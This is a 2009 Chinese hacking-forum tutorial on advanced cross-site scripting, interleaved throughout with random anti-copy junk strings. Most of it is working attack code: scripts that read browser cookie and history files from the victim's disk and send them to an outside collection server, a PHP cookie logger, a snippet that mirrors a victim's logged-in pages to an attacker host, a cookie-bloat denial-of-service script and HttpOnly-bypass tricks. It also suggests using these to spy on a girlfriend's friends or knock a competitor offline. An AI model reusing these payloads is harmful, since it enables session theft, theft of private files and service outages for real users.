XSS的高级利用部分总结 -蠕虫

admin

XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
% d7 ^- Q. C0 `- D本帖最后由 racle 于 2009-5-30 09:19 编辑

3 Y; H' X' J* Z  ^XSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
2 J, Y. j* w, _5 H- }! g: b7 XBy racle@tian6.com   
( b  }, z: Y: S2 q1 C; H/ Chttp://bbs.tian6.com/thread-12711-1-1.html
7 H: i/ f# l8 {% V转帖请保留版权

$ J# _. U; H. _- l( o
) ~9 B: U% b8 G, t
-------------------------------------------前言---------------------------------------------------------
# H6 h4 Q  j* Y$ S2 P- o

本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.
* ]- ^% z+ x! s2 E9 q4 A
1 m$ ?2 u# }$ j! f, ]& y
8 [5 Y/ f+ U# I4 N' W如果你还未具备基础XSS知识,以下几个文章建议拜读:
+ @7 c* Z' j4 z% V8 hhttp://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
http://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
http://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
/ v& i3 F* D( Ehttp://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
http://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
http://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持
$ S. Q" X& E  l0 ^0 I4 C
2 B8 a2 p) H) k4 r. Y


如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.

5 u; D1 P" y& I5 I4 }希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.
4 [+ x# e! w; f6 Y
& B) Q) a' I5 L+ q7 M* k- X如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,
/ M4 b$ z8 p# |4 E& P% E6 o4 l
: w" P* l/ c5 _$ u$ i9 r5 s9 eBaidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大

1 J# c! B2 \* u/ L. P$ yQQ ZONE,校内网XSS     感染过万QQ ZONE.

OWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪

% H) A0 Y) d, \; H# K9 ^..........
; D6 s  U: |! y2 L复制代码------------------------------------------介绍-------------------------------------------------------------

8 @9 F8 _% S& \$ C什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.

6 C$ E5 J0 g2 I3 m9 g

跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息（Cookie）,由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.

  W8 R5 y& b9 S! _9 C
+ l& @2 `- s5 i
如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
' k# @' h2 Y7 y: i7 w我们在这里重点探讨以下几个问题:
1 _) T5 O6 c+ F" a- N
1        通过XSS,我们能实现什么?
4 [& w# D. O) @
2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?
- a1 a3 Q! F3 Y+ _& q) y
( n, F; H( O% E; s. q/ T' ]3        XSS的高级利用和高级综合型XSS蠕虫的可行性?
& w) N+ e0 E. B& J3 v6 R0 g
4        XSS漏洞在输出和输入两个方面怎么才能避免.

% m. u; r- R3 B- X2 e3 |3 _

- S9 R% }$ C# r1 Z1 s, J------------------------------------------研究正题----------------------------------------------------------

/ s9 A; |5 p0 j- ?( P+ w8 o

% O: M- w. y! ~: [; ], ^# R" k通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
' _3 A% @+ }' d) ^' ]% h) n  s9 {( V复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
. ]5 v5 `# @4 ~* z# c1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
" L3 C0 L: @9 {4 G4:Http-only可以采用作为COOKIES保护方式之一.

' i$ O' V0 I3 J5 N) Z, o2 {5 d
& {2 T- C6 e# I8 j1 H


(I) AJAX在不同的浏览器下的本地文件操作权限读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)

3 Z( |! X0 R. g' p我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的，看来MS对IE这类安全风险比较重视。(这有一些问题，随后修正!)
2 Q# n9 P3 M- j


% m0 t: ?1 d" ^, y6 A    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。

6 g/ t& y7 b# R0 V1 S3 n3 a+ U. `

    3: opera9.64及以下版本允许通过指定url为file://协议进行访问；如果文件在当前目录下，则不需要指定file://协议；如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。



    4: 基于webkit内核：google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
复制代码IE6使用ajax读取本地文件    <script>
  L9 B& u$ N8 v9 S, R  a, z- I' d
    function $(x){return document.getElementById(x)}



    function ajax_obj(){
4 ~, V9 H8 V# o4 B' z' W; X
    var request = false;
2 Y4 f& x; ^1 r6 U: ]
    if(window.XMLHttpRequest) {
! l1 f0 }8 w, L4 u) w8 r/ Y
    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {

    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
$ T5 L5 A: `. |+ L, v/ A


    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

    for(var i=0; i<versions.length; i++) {
4 i: P' }4 H# h9 Q
. y5 y' p& H- m5 i+ `9 b) i    try {

    request = new ActiveXObject(versions);
9 ^# K+ D) q' \5 w- x5 s0 N1 Y: Q# D
. `) a6 U. L4 C1 o0 p+ V4 g5 _; F    } catch(e) {}

  ]+ h) {% N6 b1 |3 W# v2 v    }
9 C* j1 U) t* a9 H) q& H" n/ e
    }
6 J2 h3 P# T" }+ ?0 x+ ?% m
    return request;
3 _0 v4 @6 T. u/ L$ ^1 [
7 F3 J2 r7 z/ O0 T: n7 T' h: V) M    }
4 E  d+ L. t4 @
* T2 h+ b9 \5 A# [7 h3 N; W    var _x = ajax_obj();

  M. A5 |' L9 V" z3 b. ?5 u' @    function _7or3(_m,action,argv){

    _x.open(_m,action,false);

    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

" I) \6 O: i) d& V4 q    _x.send(argv);
# Z, j( j; O; n% `+ S5 _
    return _x.responseText;
; }8 g" d$ ~, n4 E. t
: s( T6 j6 @& Z9 [% N  k& K    }
: t6 e; M* f( A" P" m; f


. @( g" K3 D( |    var txt=_7or3("GET","file://localhost/C:/11.txt",null);

    alert(txt);
: T9 o4 F4 P0 \$ @  u
4 p' h7 @9 O9 ?( Z, ?

    </script>
' l8 h, E* a2 P! N2 M0 ]  L复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>

    function $(x){return document.getElementById(x)}

- v) c2 W, q& K. O+ r- B

    function ajax_obj(){

    var request = false;

    if(window.XMLHttpRequest) {

# X& T! |5 X' X" q7 w    request = new XMLHttpRequest();
( a% \$ K" g6 L0 l- I, a
, A: L9 d9 x6 d" u7 g8 O    } else if(window.ActiveXObject) {

9 h: C9 |( H: w! Y. e/ T: ?" n2 h8 Y    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',


! P, I  O; a2 J
! d$ p' o  y) W! L# c/ N    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

    for(var i=0; i<versions.length; i++) {

* |1 g# F! \8 r/ w8 o    try {

    request = new ActiveXObject(versions);
) _& m; K  y5 C( K$ J
    } catch(e) {}

  O7 E, Z# q0 i+ E    }
3 O  l$ P' R: L
1 u/ W* C- _7 F2 }  J$ d4 {    }
( N3 M! X' o4 }1 m: w; s
# P$ o3 t: U' K0 d2 j4 |4 p    return request;
6 F( G; o# `2 E$ e
8 B; A# X. @( q  t4 N9 y8 Z    }
% c4 J9 ]$ s0 I$ t$ Q8 @$ P
1 V% N( E( u2 H# y9 g% r# X    var _x = ajax_obj();
) q. b- P0 O% F3 y, t
4 y6 |8 `; j! z; V3 G( H! |1 ?    function _7or3(_m,action,argv){

    _x.open(_m,action,false);

    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
0 z; S% [. h3 C* C
    _x.send(argv);
# A! N' \) U3 i) B! u- H, ^
, T( N% e; M* q0 B, a) m/ c0 ?# B2 W/ z    return _x.responseText;
/ q0 D( |  M7 \0 p- i
$ c4 \3 S' t' K* K  H' S' M& @- P    }

, C6 a7 c0 }0 f! N; |; r# b8 J
3 X, `. H9 i' D) Z* R! D( i  J" F
% |% E8 P) d5 \- S1 j- h# \    var txt=_7or3("GET","1/11.txt",null);

    alert(txt);
  b' w# c' \/ f4 l) z8 k8 e


    </script>
$ o3 Y+ H) p; B) m8 S) E: d% V复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”



7 u9 R% `) j& G. [, M5 u8 o6 HChrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"
; C0 M7 F/ ?. G9 m  R- l2 I$ z0 C
+ ^) S+ i  G  s; ?+ z
7 L1 T" e- Z' u- q% Y
<?   
8 u2 Z" ?9 a- e- Q5 E
0 u" U" k" N1 M0 |% d+ a9 ^1 d/*  

     Chrome 1.0.154.53 use ajax read local txt file and upload exp  

     www.inbreak.net   
: S3 D4 J: _" C$ I
     author voidloafer@gmail.com 2009-4-22   

/ e, c' |: T! X" d8 x, w     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  
# d/ Y5 [1 Q, ~1 a
) D4 V% [3 b1 m( {4 q3 a*/  

header("Content-Disposition: attachment;filename=kxlzx.htm");   

: Z" x& O# n. a7 Y- T6 `header("Content-type: application/kxlzx");   
6 `) a! }( B: a1 q! M5 H2 ^' f
/*  

* w7 j6 ^7 ~  X     set header, so just download html file,and open it at local.  
% W# ^( u- @. y6 V
( v5 x3 q4 l) [9 q  _& e2 W' @  U*/  

?>   

<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="OST">   
7 E) B; B- c5 z+ n
     <input id="input" name="cookie" value="" type="hidden">   

, E0 Y; j# F" O</form>   
- H% v+ {; U& K
6 n! u5 V& u$ H: b2 r0 x$ {<script>   
7 e6 Q0 A0 j1 ?; T: M4 r  H
# m1 F) T6 c+ C# R- Yfunction doMyAjax(user)   
' v% F$ ^+ Z" O( D5 f" s. v- p9 @) f
{   
* ?/ J/ q8 W# G8 X4 n8 y
( f5 ~! J* X, f/ T; S6 Pvar time = Math.random();   
1 n9 Q. j! f. k) I# l- T0 z( @
/*  
7 U4 Q( z7 s# A# L7 o2 D9 U3 a! o% F
/ H5 L( [- J/ k$ P. [! Sthe cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  
8 y/ N- n2 o: F9 b- P
3 t4 S3 Z7 V2 g8 Y( o6 u/ Iand the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  

6 h5 M5 A6 q/ J: C9 Yand so on...  
% C& \4 Q. |3 `6 a1 s; b# }4 ]
( q8 }' C7 C! l1 Q, o*/  

var strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;   
- ~% D; v  J# n8 {1 C: L! f
- I5 m% I2 M/ Z: h6 r   
6 M) x  S& L) v$ k
startRequest(strPer);   
2 I8 N; Y; p- \

  b/ m, j$ \+ I$ L1 a) x5 \6 m
1 w" n/ z1 u+ S: J}   
% y, C. I( E& b* T- B. y
   
4 T* \' W% q# }+ N8 s. `
function Enshellcode(txt)   
% Y# t7 A4 x" E: {
& n0 g  m  m# y9 t  a# @. b: u{   

  M8 Z! k* W7 r  O- ]var url=new String(txt);   

var i=0,l=0,k=0,curl="";   

l= url.length;   
6 v8 U! A$ n8 c4 A1 m) o  V, e
for(;i<l;i++){   

k=url.charCodeAt(i);   

if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   

$ O5 \8 t* s  D+ @; Tif (l%2){curl+="00";}else{curl+="0000";}   
3 |3 ], U$ T4 h1 u
0 t  i5 S# ^' j! n" \curl=curl.replace(/(..)(..)/g,"%u$2$1");   
8 z' Z! r9 N6 }  S% H
return curl;   
; A- r5 V+ M# e+ ^. |
}   

4 Q+ U5 `3 y4 o& C/ P& f6 l   

0 z& _4 h+ K5 B, P+ j( m1 ~   
& I6 @6 U% z8 q& G# m8 K& O- e, t7 z
9 g7 ^3 R( B, L- M2 @var xmlHttp;   
' y/ u) s1 t( j4 ?2 `5 a
function createXMLHttp(){   

     if(window.XMLHttpRequest){   

xmlHttp = new XMLHttpRequest();           

& U3 ~& T4 L" [7 p8 Q$ S# s" y, P     }   

     else if(window.ActiveXObject){   
# R% N" t0 \% y
* a$ O# o6 V" B7 S: ?8 v  oxmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   
- F* A$ c9 O$ W1 x1 U( e: w5 Y' c6 l
) A& E2 V8 i9 S# R6 k3 E     }   
  C$ N* H6 F# Q* s6 Y7 u1 `
9 B) S  P3 D5 }# v# ]% X}   

   

" Z8 m. {, f! V5 L. v& b- D- kfunction startRequest(doUrl){   
, U: O* k+ ^) ]+ a# |: l* t' F
3 m( M1 @& d; x0 R" S   

     createXMLHttp();   
5 k5 r. G! G6 ~  N+ m! {' I

+ g8 C$ p5 a2 f! [4 ^4 M1 M
- I( R4 S4 x2 \1 V' Z/ _4 N* f     xmlHttp.onreadystatechange = handleStateChange;   
" l* ^3 G8 J7 @" Z3 a" o
9 O* O! S9 a+ G+ E4 Q( \
: x- Y" z) x( M. S* r# Q
     xmlHttp.open("GET", doUrl, true);   
  T# d; d# i' C- H" ]# U4 p! c; \
3 b  d$ c. g: m3 t- Z

     xmlHttp.send(null);   


, V# q8 H3 u% b
! q1 t& b: N- s% W0 F' [

}   

) r% o( G. f( ~: r- M. [8 L8 k   
8 S  Q  \0 ]' \  O: K" Z
9 |/ Y7 N- k: Y* @- a5 {$ jfunction handleStateChange(){   

$ s( H. n0 X% @7 U8 [+ B     if (xmlHttp.readyState == 4 ){   
1 I! u3 v* L2 F" l+ A( A
6 I% J- r9 r+ O  N2 w     var strResponse = "";   

     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);   
! u  @3 V& u! c* V
        

1 t7 Y1 N4 f$ _! I( o3 Z     }   
! G6 J! s: H$ V1 M1 e* B+ B3 h0 V
}   
0 x3 I( H) K% k/ q
   
, u. C* T9 }. k5 a  V
, G% [" e, ^3 U& f) ?0 a4 x   

function framekxlzxPost(text)   

: _; D0 M! V. s) M# ~& z' y0 h7 R{   
1 B1 c3 G1 Q- `5 n
) e! }& Z! z0 _  [     document.getElementById("input").value = Enshellcode(text);   
6 w7 U# w$ y/ z( j$ F% h* v& w2 j
; F4 ~+ F4 D: y, L     document.getElementById("form").submit();   

}   
. ~, Y% |/ g/ i: ]
0 z  r. Z- x2 T2 {" X: Y3 l! C   

doMyAjax("administrator");   

   
- F' c8 i. b* f
</script>
/ B1 [! w+ {( J9 n0 x复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  

5 @4 H; J- B2 V: R/ avar xmlHttp;  

5 x/ W+ _# L% c* f, }( V# Zfunction createXMLHttp(){  

8 T. @/ S" h1 o+ S# A+ s& m$ y4 i     if(window.XMLHttpRequest){  
1 y5 u& [& t2 b" s
         xmlHttp = new XMLHttpRequest();         

     }  
$ ^( u. s9 g. g9 I9 _! O
. _3 S0 V1 ~4 N$ C     else if(window.ActiveXObject){  

         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  
8 {  T/ `4 L' a& R# A, Q
     }  
/ W. m9 E. e. l4 b. Y5 V
}  

   
7 H2 c# l5 a/ U# s0 [
function startRequest(doUrl){  
+ l0 G9 E3 v8 j2 i! h# s
# l1 ?) c; ?/ o% t           

# Q) G1 j* B* R- Z+ }, v% I4 N# _     createXMLHttp();  

      
3 @; a8 ], }) Y1 k* C) d
     xmlHttp.onreadystatechange = handleStateChange;  
$ e# S/ E0 R3 m$ X# R0 c9 \
      
+ n( p" I% _% `
$ J8 c; K$ l# W! ~( X; @0 G     xmlHttp.open("GET", doUrl, true);  

      

: p  c% f4 t; p( C" ~$ U     xmlHttp.send(null);  
% x! e! \7 _+ f+ h1 B9 I! G
      
. ~# C( X: S% l- _% e
( o4 c5 @& u! J! S% i$ H: Q      

}   
3 o! T$ l2 T( Q4 o- w. U
   
# N0 x, [$ E: f# U4 x7 C* Q, f0 T  j
0 b- o$ [2 K7 X$ ~9 c; Kfunction handleStateChange(){  

     if (xmlHttp.readyState == 4 ){  
& _# y- ^9 M! Z& }% C
& B% T8 L, b3 {- V7 P             var strResponse = "";  
+ K4 [8 p2 q# x& @
             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   
- {- c' d6 _9 w5 W
  f- [" q3 G0 T3 b9 p               

     }  

% j9 Z* e) W  m3 h( A1 _) t# a}  
$ h" j$ F7 G& j3 K1 _% W
2 F0 E" i5 e4 _( M5 c- h4 o   

" I2 ?! k# \& b! F! V8 S8 ^function doMyAjax(user,file)  

4 ?0 H4 q% F* k) |$ V{  

* T( T6 l5 |' D8 O" @. a: A         var time = Math.random();  

           

         var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  

           
9 D5 `& U( K0 m+ l) Y! w. \+ x0 K% I
         startRequest(strPer);  

- h" ~  c4 ?9 N      

) ~: E' f- k  k$ |3 m  T}  
6 n2 w& ^# Y( C- ~2 l) c
   
8 v, Q' U; T# N
function framekxlzxPost(text)  

4 |2 z0 V( y9 ]/ U; q7 O{  
# f; V% a8 ^/ d
     document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  

     alert(/ok/);  

" K) U) m" ]2 f) j1 Q}  
' B1 l/ p- X% H( ]8 F- r
8 W9 B, ]) @0 c% y0 S' S5 H5 X   

doMyAjax('administrator','administrator@alibaba[1].txt');  

! @6 @& @5 T$ t6 C2 j$ M: {   

</script>

; s3 h, S: o  m. U' U9 h" Z

/ C: @. U  [% [' m- K9 A. u

a.php
- S. G9 H8 [+ Q; u& d- {1 @. U
/ g8 j& x$ ^; @
  @' K& n. y7 [9 {. y4 b
# T/ E  w  ^8 r. Z* W1 R- T& V' o<?php      
9 I$ ]! F3 N* R, p& H
; g0 Y" s7 |' a& s; q% G   
1 Y# e3 S; }" O  _. ]; \& ~+ E$ x5 R
$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  

4 ?$ V) }3 N( x, j; F$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   
4 O8 Z6 x. c# i- \" ~
  

, G# w+ |* I; ]$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     

fwrite($fp,$_GET["cookie"]);      

fclose($fp);   
5 R$ v3 D. N- K+ I; ?
2 w* k* K6 C: \2 `?>
; _6 @) D% u& _7 h& N复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:
$ v5 d/ @- Y. Y. i8 l7 Y
或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.

代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);
7 D; B/ k! R" o) y+ P& L
//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);
$ a" j2 J* o- H8 l% f/ O! r
  J+ J; P  _" D4 v+ E% e* q//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);
0 G! _0 N8 E, y  P
1 a* @; G1 g! |& S7 Hfunction getURL(s) {
* h- u$ J3 @  P, f2 g5 K8 s, F
var image = new Image();
, h! b# o+ ^7 F8 V* Y9 }
; a8 Q/ D/ ?) t' F5 }image.style.width = 0;

9 i, f1 t1 |+ H( }% @4 dimage.style.height = 0;
3 J) P+ _5 g9 Q" I1 @
image.src = s;
' o/ i) D" ~4 J6 ~
+ r5 \- ^- T2 A, f; l2 x}
3 T/ b% Z4 A3 r% ]8 y  M3 ~' Y
getURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
" ?# s, x' L3 \+ }1 K9 |复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
" R- A3 A$ o  W* y+ b) c! O5 u这里引用大风的一段简单代码:<script language="javascript">

, N% o1 L! H7 @  o1 w; z: ?8 e4 l7 Mvar metastr = "AAAAAAAAAA"; // 10 A
6 ~8 {/ q3 t  P: D/ `3 l
var str = "";

+ H' w! @  v6 vwhile (str.length < 4000){
9 {. ]: S: v- `$ N; g* b
    str += metastr;

$ `/ ~. Z" G' E4 O; d; X0 a}
2 k0 l; g9 ^. D* @: r: Z

) L: b+ `  [. h6 D: }2 b1 I. d+ c) t
document.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS

6 B+ z  B3 a) N8 Y9 K+ M</script>
' R* U  X. F1 o, p& h' e  g& [
详细代码请看:http://hi.baidu.com/aullik5/blog ... aeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
server limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150
( z) A1 o; @6 `! }+ o
; o; W& J$ @. f1 m2 g假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.
. P' v5 }' u2 e% I, ]! k: C
) _* T6 U) W6 w1 h' j  V5 H6 [
6 Y; R1 ^0 [5 c* K2 g8 f* V/ x


% k1 P* W$ ~6 h- Z- T2 d! \
% k5 O4 C! b& S(III) Http only bypass 与 补救对策:

什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性，用以阻止客户端脚本访问Cookie.
; G% j# D% U& g0 _. X* y以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">
$ V' e1 M2 @8 h
<!--

7 l8 Q8 S) y. X7 ]3 s: B1 @function normalCookie() {
: s6 ^9 y/ m7 m, M' ^/ C
- B% t: N+ `1 U( adocument.cookie = "TheCookieName=CookieValue_httpOnly";

alert(document.cookie);

2 u* y% r" S+ L+ s$ R  ?5 |/ H}
2 S) [% b& y9 f' R; ^



9 k+ S% e5 e/ O& H6 T
function httpOnlyCookie() {

$ a, V* C" Y" K$ gdocument.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";
( O! {; u7 k, P* u, m* I
alert(document.cookie);}

/ z" H: `' D1 ?$ a% c- l0 {
8 N/ i& a, X) o' S0 t
  R9 i& ^. v, \//-->
, f3 G. b, ^$ x5 h' x
</script>
/ b  U2 ~, A. a- `1 h4 y
* F; w8 {& G1 y" }, e+ j2 W

<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE='Display Normal Cookie'>

<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE='Display HTTPONLY Cookie'></FORM>
& N& d+ d$ A; p- ?) E复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>


# D% k6 ~$ o$ h  n2 ~# _; D8 D9 z
var request = false;

) V: w% E: B( I9 L6 e2 l& Q6 y        if(window.XMLHttpRequest) {
5 E  @2 c. k9 L$ N, L
            request = new XMLHttpRequest();
+ X: R5 I- V/ Q3 L
, w* k& ?" K5 ]' ~" ]            if(request.overrideMimeType) {

- t7 l3 V% \0 r2 O7 l: j, R                request.overrideMimeType('text/xml');
, f2 x# d' ~+ j! ^- n' H
            }

        } else if(window.ActiveXObject) {

            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

( m% u3 p4 O1 p6 u& K' T1 W7 ]            for(var i=0; i<versions.length; i++) {

                try {
$ K7 f* H. A4 ^+ H
8 v- |' w  ^1 V                    request = new ActiveXObject(versions);

                } catch(e) {}
$ f! c% f+ g( U% N
% C/ u8 y; k' b5 v4 U6 z' O            }

9 H! Z9 ]0 Z$ A$ f( `4 L3 h" Y        }

xmlHttp=request;

xmlHttp.open("TRACE","http://www.vul.com",false);
* _6 j* ?# k) j& L' t8 I
6 ]" m1 o! x/ C$ G2 y8 r. MxmlHttp.send(null);
7 \5 p7 T: ^# d: F/ p
/ g( |, O/ h- h$ a+ M% wxmlDoc=xmlHttp.responseText;
9 J' \8 |9 i6 {2 A
alert(xmlDoc);

</script>
复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>
. F( k1 _% O, A
' W) J) i9 O" l- v$ T- k* S  w  Fvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

3 J3 m/ s* D& [XmlHttp.send(null);

: }1 n$ I/ s$ N3 }var resource=xmlHttp.responseText
5 T1 s/ W' }  f) _
resource.search(/cookies/);

9 I! w9 p$ M6 ?) q......................
- `+ v/ e- B( ^0 L8 l0 I4 H0 J
</script>

$ i$ h1 J  k8 I6 }/ [% D+ g! K



如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求

0 T6 O* f3 X0 r0 f5 h[code]

& ]7 _) l5 }! a' ~4 A  cRewriteEngine On

RewriteCond %{REQUEST_METHOD} ^TRACE
, t1 _* y3 d! S( M% M! k8 ?
) E9 a1 s) g" H8 r, u/ j$ ERewriteRule .* - [F]

$ I& ^3 i1 A5 C2 b" ^: s

Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求

acl TRACE method TRACE

0 {) X) ~' N8 m. e+ K# l4 i, x4 R/ ]...

* A0 f9 P, Q% X. U; t8 whttp_access deny TRACE
复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>

; O$ d2 r9 Z$ f9 T) ?8 m* Gvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

XmlHttp.open("GET","http://www.google.com",false);
, [& M: ?  z: ]5 S9 a
& [2 W$ j& ]* k; a0 D" Z2 {) bXmlHttp.setRequestHeader("Host","www.evil.com/collet.php");
9 a  j9 z: A' m, m6 \
XmlHttp.send(null);
